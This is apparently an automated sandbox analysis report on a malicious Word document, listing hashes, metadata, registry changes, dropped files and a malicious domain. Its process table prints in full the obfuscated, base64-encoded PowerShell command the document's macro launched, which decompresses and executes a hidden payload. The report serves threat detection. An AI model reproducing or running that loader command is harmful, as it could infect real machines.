File name: | a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064 |
Full analysis: | https://app.any.run/tasks/8048917d-0e7e-4e37-b77f-dd4d0bc7a6d5 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 18:31:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: cpjbhtiycbv, Subject: jojxdlzfhywl, Comments: notvcbcbjdajgyxytmqabeqpac, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Jul 4 04:22:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 860C7E42621B4BDBC96E376848B3DB1B |
SHA1: | 42E79D2120E84DF854DBA7549027D704471AF0A0 |
SHA256: | A088F745242B8249917993945089BA36D426EE597D803B1824DC9B3D30E2C064 |
SSDEEP: | 1536:cajjRgtFxaJp9m+x5m+AeS6U47taYyXpMxS:jjjRgNa9m+RSSB1qpMxS |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 22528 |
Company: | - |
Manager: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:07:04 03:22:00 |
CreateDate: | 2018:04:25 21:21:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal |
Comments: | notvcbcbjdajgyxytmqabeqpac |
Keywords: | - |
Author: | - |
Subject: | jojxdlzfhywl |
Title: | cpjbhtiycbv |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3716 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3132 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco IAAoACAALgAoACcATgBFAFcAJwArACcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAFMAWQBTAHQARQBNAGAALgBpAG8AYAAuAGMATwBtAFAAcgBgAEUAYABzAFMAaQBPAGAATgAuAGQARQBgAEYAbABhAFQAZQBgAFMAdAByAGUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBlADYANABzAFQAUgBpAG4ARwAoACcAUgBZAC8AQgBUAG8ATgBBAEcASQBUAHYASgByADcARABIAGoAQQBMAHcAUwA1AEoASgBiAEYAQwBpAE4ARgBTAEcAeABKAEQAbQAwAHIAcgBRAFUAMABLADYAMAA5AFoAbwBlAHoASwBiAGsAcwBwADQAZAAzAGwAVQBOAHYATAB6AEcAVgBtADgAbwAzAEcAVgBuAHgAMAAvADcAeABEAEgAcwBLAGkAWABzAGsAOABvAFEAVgAyAHQAUwBtAGQATABhAFAANAB4AGQATwBnADMARABzADcAQwBaAFcAbwBlAE0AbwBLAE0AUABFAG4ATgByAFYAVAB4ADgAUQBFAEQAdABDAG4AdQBaADAAKwBMAEwAOAA5AG8AdQBNAFMAbQB4AGoAcQBBAGUAOAB0ACsAUQBHAHEAcwBJAEYAQwBXAEUAZAByAFUAawBPAHkASAByADgAeQBDAEMATgBYADIAKwA4AFcALwB1AHoAcABPAFAAWgB3AHAAcABSAHcATABDAHQATAA0AGsAcgB4AE0AcQA4AFoATgBPAFQAUQBIAEMAMQBXAC8AMQBxADEAawBEAGsAUgBtAFgAZwBzAHYASQB4AHYAaAB5AFMAWABtAEUAaABSAE0ASwBYAGoARwAyAHkANABLAGEAOABnAHAAcABtAHUAQgBYAE8AeAB0AFUAUAAyAGoAbABpAEoAegB0AE4ARwBxADYAcQBtAFAAWQBFAFIAbgA5AGQAaAB3AFcATQAvAEQAWQByAEoAcABYAEMATAAvAG0AOABhAGIAcABBAGkAWABlAC8ANQBwADYAQQBHAFEAUQArAHYAbwBKAGQAdABUADMAKwBPAGsARwBJAFMAVABsAFcARwBCAGgAdABBAFEALwB0AHUAWgBCAHUAbwAvAGYAQgBaAHYAQwBtADUAVgBJAHgASwBNAHEAOAA0AEIAUwBtAC8ASABPAGMAdABpAGgAZABLAHYANAB3AG4AUABXAG4AdQBkAGgAMgBOAEYAYwAzAGEAcgByAHUAKwArAGcATQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBFAFMAUwBJAE8ATgBtAE8AZABlAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAGUAYQBkAGUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEARAB0AG8AZQBOAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcAZQB4ACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | qs$ |
Value: 71732400840E0000010000000000000000000000 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1324023838 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1324023952 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1324023953 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 840E00009A2DFCD91638D50100000000 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | jt$ |
Value: 6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | jt$ |
Value: 6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B51.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UUSED6Z8MWD0SDCLYFDP.temp | — | |
MD5:— | SHA256:— | |||
3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:2B750E90A4B89E831E6358713AF21201 | SHA256:5882D6220148A5C0346CEF118FB2CC2F175422E3E7BDBF8AA0D90BD1856FAF22 | |||
3716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$88f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.doc | pgc | |
MD5:EDCE3B19BF70A35DB3868891CB4C3750 | SHA256:91644194A40B9730CC2A4882E819D202372D625B8E650540278FE4B79BBCE860 | |||
3716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:51DA5FE52031A97E3360B3BD197C6843 | SHA256:71A69D103A520831A9EAB13321EEEB6B2DA848479DE7A6DF34B4A63436E20611 | |||
3132 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16743a.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 |
Domain | IP | Reputation |
---|---|---|
hbartonkwiey.xyz |
| malicious |